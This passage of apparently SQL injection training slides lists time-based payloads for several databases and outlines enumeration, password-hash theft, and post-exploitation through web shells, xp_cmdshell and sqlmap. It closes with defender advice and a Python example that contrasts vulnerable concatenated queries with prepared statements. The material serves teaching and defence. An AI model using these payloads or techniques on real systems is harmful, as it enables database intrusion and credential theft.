  - Common payloads are: AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0) (MySQL), ;IF(2>1) WAITFOR DELAY '0:0:5' (Microsoft SQL Server), ;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000) (PostgreSQL), etc.

• 17. Attacking workflow (7)
  - The enumeration phase consists of retrieving ("stealing") data of interest:
      database and table names
      table dumps (e.g. users, admin, ...)
      system-stored usernames and password hashes
      user privileges and roles
  - Highly DBMS dependent (system database and table names, common function names, etc.)
  - Usage of automated tools is highly preferable with the boolean/blind and time-based techniques

• 18. Attacking workflow (8)
  - Eventual post-exploitation is highly bounded by the applicable SQL injection technique(s) and the current user's privileges
  - Best/worst case scenario is the availability of the stacked technique along with "admin" (DBA) privileges
  - UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL SELECT ... INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL Server xp_cmdshell), etc.

• 19. Process automation
  1) Web application assessment proxy (optional) – Burp, WebScarab
  2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja
  3) Second-order exploitation framework (optional) – Metasploit

• 20. Introducing sqlmap
  - "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)"
  - Unofficially, sqlmap is an AIO (All-In-One) SQL injection tool
  - Over 10,000 repository updates and/or checkouts on a monthly basis
  - Part of the most popular security distributions: BackTrack, BackBox, Web Security Dojo, OWASP Web Testing, ...

• 21. sqlmap capabilities
  - Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
  - Fully supported SQL injection techniques: boolean/blind, error-based, union/inband (partial & full), time-based, stacked
  - Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc.

• 22. sqlmap capabilities (2)
  - Automatic recognition and cracking of password hashes
  - Support for IDS/WAF evasion in the form of "tampering" scripts
  - Web server file upload/download
  - Arbitrary OS command execution and retrieval of standard console output
  - Establishment of an out-of-band connection between the attacker's machine and the database server (TCP/UDP via Metasploit, ICMP via ICMPsh)

• 23. Closing words (for attackers)
  - Learn SQL more than "well": "SQL injection is 100% SQL. The rest is injection"
  - Set up a (virtual) vulnerable environment entirely by yourself, for gaining a better mindset and possessing a LEGAL assessment testing machine
  - Mimic with comprehension what other "attackers" do, including automated tools (e.g. sqlmap)
  - Research defensive mechanisms, for advanced comprehension of the topic

• 24. Closing words (for defenders)
  - Use (only) prepared SQL statements: bullet-proof against SQL injection for bound values (identifiers such as table names or ORDER BY columns cannot be bound and must be checked against a whitelist instead)
  - Self-filtering procedures are prone to common "programmer's" mistakes (e.g. forgetting to hard type-cast an integer parameter value)
  - Turn off DBMS error reporting towards the client (log errors server-side instead)
  - Run with least privilege (a non-admin "query" user)
  - Always expect the worst scenario and set up accordingly (e.g. use the GRANT/REVOKE mechanism accordingly)
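The first two defender points of slide 24 side by side, as an added example in Python (not code from the slides): the slide 3 concatenation pattern, a "self-filtering" variant that escapes quotes but forgets the integer type-cast, the hard type-cast, and a prepared statement. The data is a constructed in-memory SQLite table; the attack value `1 OR 1=1` is the slide 13 boolean payload in its numeric form, which needs no quote at all.

```python
import sqlite3

# Constructed sample data (not real data).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE users (id INTEGER, name TEXT)")
con.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])


def lookup_concatenated(user_id: str) -> list:
    """The slide 3 pattern: the parameter is parsed as part of the SQL text."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in con.execute(sql)]


def lookup_quote_escaped(user_id: str) -> list:
    """Self-filtering that only escapes quotes. In a numeric context the payload
    needs no quote at all, so the query is still injectable."""
    sql = "SELECT name FROM users WHERE id = " + user_id.replace("'", "''")
    return [row[0] for row in con.execute(sql)]


def lookup_typecast(user_id: str) -> list:
    """Hard type-cast: int() raises ValueError on anything but an integer
    (e.g. on '1 OR 1=1'), so only a number can ever reach the SQL text."""
    sql = "SELECT name FROM users WHERE id = %d" % int(user_id)
    return [row[0] for row in con.execute(sql)]


def lookup_prepared(user_id: str) -> list:
    """Prepared statement: the statement is parsed first and the value is bound
    afterwards, so the value can never change the statement's structure."""
    sql = "SELECT name FROM users WHERE id = ?"
    return [row[0] for row in con.execute(sql, (user_id,))]


if __name__ == "__main__":
    payload = "1 OR 1=1"
    print("concatenated :", lookup_concatenated(payload))   # every user
    print("quote-escaped:", lookup_quote_escaped(payload))  # still every user
    print("prepared     :", lookup_prepared(payload))       # nothing: no id equals that text
```

With the bound parameter the whole string `1 OR 1=1` is compared against the integer column as a value and matches nothing, while the two concatenating variants return every row. Binding does not make an unsafe query safe by itself: the query text must be fixed at the call site, and anything that cannot be a bind parameter (column or table names) still needs a whitelist.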
• 25. Questions?